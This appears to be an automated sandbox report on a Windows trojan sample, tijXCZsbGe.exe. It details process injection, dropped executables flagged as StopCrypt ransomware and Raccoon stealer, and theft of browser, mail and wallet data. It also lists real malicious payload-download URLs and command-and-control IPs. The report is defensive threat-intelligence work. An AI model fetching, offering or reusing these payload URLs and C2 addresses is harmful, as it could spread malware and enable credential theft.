Command and Control: Ingress Tool Transfer 15; Encrypted Channel 22; Non-Standard Port 1; Non-Application Layer Protocol 5; Application Layer Protocol 36; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS; Proxy; Internal Proxy

Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station

Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups

Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

Behavior Graph

Behavior Graph ID: 553073, Sample: tijXCZsbGe.exe, Startdate: 14/01/2022, Architecture: WINDOWS, Score: 100

Text rendering of the behavior graph image (process tree with the network contacts, dropped files and signatures attached to each node; bracketed numbers after a process name are the graph's created-file/registry-value counts).

Start
  Network: 185.215.113.35, ports 49890, 49891, 49893 (WHOLESALECONNECTIONSNL, Portugal); patmushta.info; microsoft-com.mail.protection.outlook.com
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 24 other signatures
  - tijXCZsbGe.exe (started)
    - tijXCZsbGe.exe (started)
      Signatures: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration)
      - explorer.exe [10] (injected)
        Network: 185.233.81.115, ports 443, 49784 (SUPERSERVERSDATACENTERRU, Russian Federation); 188.166.28.199, port 80 (DIGITALOCEAN-ASNUS, Netherlands); 11 other IPs or domains
        Dropped: C:\Users\user\AppData\Roaming\rifsswe (PE32); C:\Users\user\AppData\Local\Temp\F65C.exe (PE32); C:\Users\user\AppData\Local\Temp748.exe (PE32, path as extracted); 9 other malicious files
        Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Hides that the sample has been downloaded from the Internet (zone.identifier)
        - DB31.exe (started)
          Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Found evasive API chain (may stop execution after checking mutex); 4 other signatures
        - E748.exe [2] (started)
          Dropped: C:\Users\user\AppData\Local\...\gecrjwsv.exe (PE32)
          Signatures: Machine Learning detection for dropped file; 2 other signatures
          - cmd.exe [1] (started) -> conhost.exe; Dropped: C:\Windows\SysWOW64\...\gecrjwsv.exe (copy) (PE32)
          - cmd.exe [2] (started) -> conhost.exe
          - sc.exe [1] (started) -> conhost.exe
          - 3 other processes -> conhost.exe, conhost.exe
        - F65C.exe [3] (started)
          Dropped: C:\Users\user\AppData\Local\...\F65C.exe.log (ASCII)
          Signatures: Antivirus detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); Injects a PE file into a foreign processes
          - F65C.exe (started)
            Network: 86.107.197.138, ports 38133, 49882 (MOD-EUNL, Romania)
            Signatures: Tries to steal Crypto Currency Wallets
        - 2 other processes
          Network: 185.163.204.24 (CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE, Germany); 185.163.45.70, port 80 (MIVOCLOUDMD, Moldova Republic of); 185.163.204.22, ports 49910, 80 (CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE, Germany)
          Dropped: C:\Users\user\AppData\LocalLow\sqlite3.dll (PE32)
          Signatures: Multi AV Scanner detection for dropped file; Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
          - WerFault.exe [23 9] (started)
  - rifsswe (started)
    Signatures: Machine Learning detection for dropped file; Contains functionality to inject code into remote processes; Injects a PE file into a foreign processes
    - rifsswe (started)
      Signatures: Creates a thread in another existing process (thread injection)
  - gecrjwsv.exe (started)
    Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Writes to foreign memory regions; Allocates memory in foreign processes
    - svchost.exe (started)
      Network: patmushta.info 185.188.183.61, ports 443, 49850 (SUPERSERVERSDATACENTERRU, Russian Federation); microsoft-com.mail.protection.outlook.com 40.93.207.0, ports 25, 49844 (MICROSOFT-CORP-MSN-AS-BLOCKUS, United States)
      Signatures: System process connects to network (likely due to code injection or exploit)
  - 5 other processes
    - WerFault.exe (started)

Screenshots

(Screenshot thumbnails are not reproduced in this text version of the report.)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
tijXCZsbGe.exe | 34% | Virustotal |
tijXCZsbGe.exe | 40% | ReversingLabs | Win32.Trojan.Generic
tijXCZsbGe.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\gecrjwsv.exe | 100% | Avira | TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\F65C.exe | 100% | Avira | HEUR/AGEN.1211353
C:\Users\user\AppData\Local\Temp\5C89.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\rifsswe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\DB31.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\gecrjwsv.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\9334.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\6FB4.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\B0F7.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\F65C.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\C7FA.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\8783.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\9DFA.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\E748.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\LocalLow\sqlite3.dll | 0% | Metadefender |
C:\Users\user\AppData\LocalLow\sqlite3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\5C89.exe | 34% | Metadefender |
C:\Users\user\AppData\Local\Temp\5C89.exe | 77% | ReversingLabs | Win32.Ransomware.StopCrypt
C:\Users\user\AppData\Local\Temp\6FB4.exe | 29% | Metadefender |
C:\Users\user\AppData\Local\Temp\6FB4.exe | 81% | ReversingLabs | Win32.Trojan.Raccrypt
C:\Users\user\AppData\Local\Temp\9334.exe | 46% | Metadefender |
C:\Users\user\AppData\Local\Temp\9334.exe | 77% | ReversingLabs | Win32.Trojan.Raccoon
C:\Users\user\AppData\Local\Temp\B0F7.exe | 34% | Metadefender |
C:\Users\user\AppData\Local\Temp\B0F7.exe | 77% | ReversingLabs | Win32.Ransomware.StopCrypt

Unpacked PE Files

Source | Detection | Scanner | Label
18.0.F65C.exe.ab0000.2.unpack | 100% | Avira | HEUR/AGEN.1211353
11.0.9334.exe.480e50.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
16.3.DB31.exe.660000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
16.2.DB31.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.0.rifsswe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1123244
11.0.9334.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
11.3.9334.exe.5f0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
35.0.F65C.exe.400000.6.unpack | 100% | Avira | HEUR/AGEN.1145065
18.0.F65C.exe.ab0000.1.unpack | 100% | Avira | HEUR/AGEN.1211353
32.2.gecrjwsv.exe.580e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.0.tijXCZsbGe.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.0.rifsswe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1123244
38.3.5C89.exe.4d40000.2.unpack | 100% | Avira | TR/Crypt.EPACK.Gen2
35.0.F65C.exe.4d0000.13.unpack | 100% | Avira | HEUR/AGEN.1211353
10.0.rifsswe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1123244
35.0.F65C.exe.4d0000.1.unpack | 100% | Avira | HEUR/AGEN.1211353
1.0.tijXCZsbGe.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.0.rifsswe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
11.0.9334.exe.480e50.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
34.2.svchost.exe.5d0000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
35.0.F65C.exe.4d0000.7.unpack | 100% | Avira | HEUR/AGEN.1211353
35.0.F65C.exe.4d0000.11.unpack | 100% | Avira | HEUR/AGEN.1211353
35.0.F65C.exe.400000.10.unpack | 100% | Avira | HEUR/AGEN.1145065
0.2.tijXCZsbGe.exe.5615a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
35.0.F65C.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1145065
32.3.gecrjwsv.exe.5a0000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
11.0.9334.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
18.0.F65C.exe.ab0000.3.unpack | 100% | Avira | HEUR/AGEN.1211353
35.0.F65C.exe.4d0000.5.unpack | 100% | Avira | HEUR/AGEN.1211353
35.0.F65C.exe.400000.8.unpack | 100% | Avira | HEUR/AGEN.1145065
1.1.tijXCZsbGe.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
11.2.9334.exe.480e50.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
35.0.F65C.exe.4d0000.3.unpack | 100% | Avira | HEUR/AGEN.1211353
18.0.F65C.exe.ab0000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
35.0.F65C.exe.4d0000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
1.2.tijXCZsbGe.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
35.0.F65C.exe.4d0000.2.unpack | 100% | Avira | HEUR/AGEN.1211353
10.2.rifsswe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
17.2.E748.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
10.0.rifsswe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1123244
11.2.9334.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
17.3.E748.exe.650000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
9.2.rifsswe.6315a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
18.2.F65C.exe.ab0000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
35.0.F65C.exe.400000.12.unpack | 100% | Avira | HEUR/AGEN.1145065
32.2.gecrjwsv.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
16.2.DB31.exe.640e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
10.0.rifsswe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
38.2.5C89.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1127993
32.2.gecrjwsv.exe.5a0000.2.unpack | 100% | Avira | BDS/Backdoor.Gen
10.0.rifsswe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
35.0.F65C.exe.4d0000.9.unpack | 100% | Avira | HEUR/AGEN.1211353
17.2.E748.exe.630e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
10.1.rifsswe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.0.tijXCZsbGe.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://185.163.45.70/capibar | 12% | Virustotal |
http://185.163.45.70/capibar | 100% | Avira URL Cloud | phishing
http://185.7.214.171:8080/6.php | 100% | URL Reputation | malware
http://host-data-coin-11.com/ | 0% | URL Reputation | safe
http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/724da1c439bafff55600e6bd8e8cc799e96c03351 | 0% | Avira URL Cloud | safe
http://185.215.113.35/d2VxjasuwS/index.php | 12% | Virustotal |
http://185.215.113.35/d2VxjasuwS/index.php | 0% | Avira URL Cloud | safe
http://data-host-coin-8.com/files/6961_1642089187_2359.exe | 13% | Virustotal |
http://data-host-coin-8.com/files/6961_1642089187_2359.exe | 100% | Avira URL Cloud | malware
http://185.215.113.35/d2VxjasuwS/index.php?scr=1 | 0% | Avira URL Cloud | safe
http://185.163.204.24/ | 0% | Avira URL Cloud | safe
http://data-host-coin-8.com/game.exe | 0% | URL Reputation | safe
http://data-host-coin-8.com/files/8474_1641976243_3082.exe | 100% | Avira URL Cloud | malware
http://185.163.45.70/capibarvg | 100% | Avira URL Cloud | phishing
http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/71fe7726da53cb25be1ef5cfcccec20e728d94fe | 0% | Avira URL Cloud | safe
https://www.disneyplus.com/legal/your-california-privacy-rights | 0% | URL Reputation | safe
https://api.ip.sb/ip | 0% | URL Reputation | safe
http://unicupload.top/install5.exe | 100% | URL Reputation | phishing
http://crl.ver) | 0% | Avira URL Cloud | safe
http://185.163.204.22/capibar | 100% | Avira URL Cloud | malware
https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
http://178.62.113.205/capibard | 0% | Avira URL Cloud | safe
https://www.disneyplus.com/legal/privacy-policy | 0% | URL Reputation | safe
https://185.163.204.22/capibar | 100% | Avira URL Cloud | malware
http://data-host-coin-8.com/files/7729_1642101604_1835.exe | 100% | Avira URL Cloud | malware
http://data-host-coin-8.com/files/9030_1641816409_7037.exe | 100% | Avira URL Cloud | malware
http://185.215.113.35/d2VxjasuwS/plugins/cred.dll | 100% | Avira URL Cloud | malware
http://185.163.204.24/22 | 0% | Avira URL Cloud | safe
http://178.62.113.205/capibar | 0% | Avira URL Cloud | safe
https://disneyplus.com/legal. | 0% | URL Reputation | safe
http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/724da1c439bafff55600e6bd8e8cc799e96c0335 | 0% | Avira URL Cloud | safe
http://185.163.204.22/capibarp | 100% | Avira URL Cloud | malware
http://help.disneyplus.com. | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
unicupload.top | 54.38.220.85 | true | false | | high
host-data-coin-11.com | 8.209.70.0 | true | false | | high
patmushta.info | 185.188.183.61 | true | false | | high
cdn.discordapp.com | 162.159.135.233 | true | false | | high
microsoft-com.mail.protection.outlook.com | 40.93.207.0 | true | false | | high
goo.su | 172.67.139.105 | true | false | | high
transfer.sh | 144.76.136.153 | true | false | | high
a0621298.xsph.ru | 141.8.194.74 | true | false | | high
data-host-coin-8.com | 8.209.70.0 | true | false | | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://a0621298.xsph.ru/7.exe | false | | high
http://185.7.214.171:8080/6.php | true | URL Reputation: malware | unknown
http://host-data-coin-11.com/ | false | URL Reputation: safe | unknown
http://185.215.113.35/d2VxjasuwS/index.php | true | 12% Virustotal; Avira URL Cloud: safe | unknown
http://data-host-coin-8.com/files/6961_1642089187_2359.exe | true | 13% Virustotal; Avira URL Cloud: malware | unknown
http://185.215.113.35/d2VxjasuwS/index.php?scr=1 | true | Avira URL Cloud: safe | unknown
http://185.163.204.24/ | true | Avira URL Cloud: safe | unknown
http://data-host-coin-8.com/game.exe | false | URL Reputation: safe | unknown
http://data-host-coin-8.com/files/8474_1641976243_3082.exe | true | Avira URL Cloud: malware | unknown
http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/71fe7726da53cb25be1ef5cfcccec20e728d94fe | true | Avira URL Cloud: safe | unknown
http://unicupload.top/install5.exe | true | URL Reputation: phishing | unknown
http://185.163.204.22/capibar | true | Avira URL Cloud: malware | unknown
http://a0621298.xsph.ru/9.exe | false | | high
http://data-host-coin-8.com/files/7729_1642101604_1835.exe | true | Avira URL Cloud: malware | unknown
http://data-host-coin-8.com/files/9030_1641816409_7037.exe | true | Avira URL Cloud: malware | unknown
http://185.215.113.35/d2VxjasuwS/plugins/cred.dll | true | Avira URL Cloud: malware | unknown
http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/724da1c439bafff55600e6bd8e8cc799e96c0335 | true | Avira URL Cloud: safe | unknown

                                                URLs from Memory and Binaries

Name: https://duckduckgo.com/chrome_newtab
Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmp
Malicious: false
Reputation: high

Name: http://185.163.45.70/capibar
Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmp
Malicious: true
Antivirus Detection: 12%, Virustotal; Avira URL Cloud: phishing
Reputation: unknown

Name: https://duckduckgo.com/ac/?q=
Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmp
Malicious: false
Reputation: high

Name: https://support.google.com/chrome/answer/6258784
Source: 5C89.exe, 00000026.00000002.1043200803.0000000005200000.00000004.00000001.sdmp
Malicious: false
Reputation: high

Name: https://telegram.org/img/t_logo.png
Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmp
Malicious: false
Reputation: high

Name: http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/724da1c439bafff55600e6bd8e8cc799e96c03351
Source: 5C89.exe, 00000026.00000002.1049327482.0000000005239000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: https://t.me/capibar
Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmp
Malicious: false
Reputation: high

Name: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
Source: 5C89.exe, 00000026.00000002.1049327482.0000000005239000.00000004.00000001.sdmp
Malicious: false
Reputation: high

Name: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: 5C89.exe, 00000026.00000002.1049327482.0000000005239000.00000004.00000001.sdmp
Malicious: false
Reputation: high

Name: https://www.google.com/gws_rd=ssl
Source: 5C89.exe, 00000026.00000002.1043200803.0000000005200000.00000004.00000001.sdmp
Malicious: false
Reputation: high

Name: http://185.163.45.70/capibarvg
Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmp
Malicious: true
Antivirus Detection: Avira URL Cloud: phishing
Reputation: unknown

Name: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 0000001C.00000003.801590976.000001C02177D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801757401.000001C021C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801683194.000001C0217BE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801724830.000001C02179E000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://api.ip.sb/ip
Source: F65C.exe, 00000012.00000002.825741767.0000000003F01000.00000004.00000001.sdmp, F65C.exe, 00000023.00000000.820336133.0000000000402000.00000040.00000001.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmp
Malicious: false
Reputation: high

Name: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmp
Malicious: false
Reputation: high

Name: http://crl.ver)
Source: svchost.exe, 0000001C.00000002.825450760.000001C021700000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: low

Name: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: 5C89.exe, 00000026.00000002.1049327482.0000000005239000.00000004.00000001.sdmp
Malicious: false
Reputation: high

Name: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmp
Malicious: false
Reputation: high

Name: https://www.tiktok.com/legal/report/feedback
Source: svchost.exe, 0000001C.00000003.802948696.000001C02178F000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.802872605.000001C0217A6000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.803050058.000001C021C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.802727525.000001C0217A6000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.802640576.000001C021759000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://178.62.113.205/capibard
Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmp
Malicious: false
Reputation: high

Name: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
Source: 5C89.exe, 00000026.00000002.1049327482.0000000005239000.00000004.00000001.sdmp
Malicious: false
Reputation: high

Name: https://ac.ecosia.org/autocomplete?q=
Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmp
Malicious: false
Reputation: high

Name: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000001C.00000003.801590976.000001C02177D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801757401.000001C021C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801683194.000001C0217BE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801724830.000001C02179E000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://185.163.204.22/capibar
Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmp
Malicious: true
Antivirus Detection: Avira URL Cloud: malware
Reputation: unknown

Name: http://185.163.204.24/22
Source: 5C89.exe, 00000026.00000002.1043200803.0000000005200000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: http://178.62.113.205/capibar
Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmp
Malicious: false
Antivirus Detection: Avira URL Cloud: safe
Reputation: unknown

Name: https://disneyplus.com/legal.
Source: svchost.exe, 0000001C.00000003.801590976.000001C02177D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801757401.000001C021C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801683194.000001C0217BE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801724830.000001C02179E000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: http://185.163.204.22/capibarp
Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmp
Malicious: true
Antivirus Detection: Avira URL Cloud: malware
Reputation: unknown

Name: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmp
Malicious: false
Reputation: high

Name: http://help.disneyplus.com.
Source: svchost.exe, 0000001C.00000003.801590976.000001C02177D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801757401.000001C021C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801683194.000001C0217BE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801724830.000001C02179E000.00000004.00000001.sdmp
Malicious: false
Antivirus Detection: URL Reputation: safe
Reputation: unknown

Name: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmp
Malicious: false
Reputation: high

                                                                                  Contacted IPs

                                                                                  Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.163.45.70 | unknown | Moldova Republic of | 39798 | MIVOCLOUDMD | false
40.93.207.0 | microsoft-com.mail.protection.outlook.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
185.215.113.35 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
188.166.28.199 | unknown | Netherlands | 14061 | DIGITALOCEAN-ASNUS | true
172.67.139.105 | goo.su | United States | 13335 | CLOUDFLARENETUS | false
86.107.197.138 | unknown | Romania | 39855 | MOD-EUNL | false
8.209.70.0 | host-data-coin-11.com | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
54.38.220.85 | unicupload.top | France | 16276 | OVHFR | false
162.159.135.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false
144.76.136.153 | transfer.sh | Germany | 24940 | HETZNER-ASDE | false
185.233.81.115 | unknown | Russian Federation | 50113 | SUPERSERVERSDATACENTERRU | true
185.188.183.61 | patmushta.info | Russian Federation | 50113 | SUPERSERVERSDATACENTERRU | false
185.7.214.171 | unknown | France | 42652 | DELUNETDE | true
185.186.142.166 | unknown | Russian Federation | 204490 | ASKONTELRU | true
141.8.194.74 | a0621298.xsph.ru | Russian Federation | 35278 | SPRINTHOSTRU | false
185.163.204.22 | unknown | Germany | 20771 | CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE | false
185.163.204.24 | unknown | Germany | 20771 | CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE | true

                                                                                  Private

                                                                                  IP
                                                                                  192.168.2.1

                                                                                  General Information

                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                  Analysis ID:553073
                                                                                  Start date:14.01.2022
                                                                                  Start time:09:23:23
                                                                                  Joe Sandbox Product:CloudBasic
                                                                                  Overall analysis duration:0h 16m 57s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:light
                                                                                  Sample file name:tijXCZsbGe.exe
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                  Number of analysed new started processes analysed:50
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:1
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • HDC enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@59/23@82/18
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HDC Information:
                                                                                  • Successful, ratio: 25.1% (good quality ratio 19.3%)
                                                                                  • Quality average: 60.8%
                                                                                  • Quality standard deviation: 39.6%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 56%
                                                                                  • Number of executed functions: 0
                                                                                  • Number of non-executed functions: 0
                                                                                  Cookbook Comments:
                                                                                  • Adjust boot time
                                                                                  • Enable AMSI
                                                                                  • Found application associated with file extension: .exe
